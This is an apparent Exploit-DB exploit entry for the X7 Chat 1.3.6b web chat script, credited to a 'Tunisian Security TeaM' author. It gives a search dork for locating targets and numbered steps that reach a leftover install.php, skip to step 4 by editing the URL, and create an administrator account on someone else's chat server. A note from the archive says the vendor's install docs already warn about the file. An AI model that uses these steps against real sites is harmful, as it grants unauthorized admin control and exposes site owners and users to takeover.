###################################################### [+] Author : d4rk-h4ck3r# [+] Email : tnst@w.cn# [+] Site : www.vbspiders.com/vb# [+] Team : Tunisian Security TeaM# [+] Dork : powered by x7 chat 1.3.6b########################################################## Exploit-DB Notes ############# Vendor has already addressed this issue and even provided a solution in Docs/INSTALL.txt:# "After finishing the online setup delete the file install.php.If you do not it will be # possible for anyone to create an administrator account on your chat server."# # Therefore please keep in mind this exploit is not guaranteed to work.#####################################################
The exploit :1- go http://site.com/script/X7Chat/install.php
2- Now you are in X7 Chat Install step 1 click continue3- Now you are in X7 Chat Install step 2 click also continue4- Now you are in X7 Chat Install step 3.
change url from http://site.com/script/x7chat/install.php?step=3 to http://site.com/script/x7chat/install.php?step=45- now add user name and password
6- Go login page http://site.com/script/X7Chat/index.php
Good luck and don't make something bad .
Greetz to Password & Maxilog .
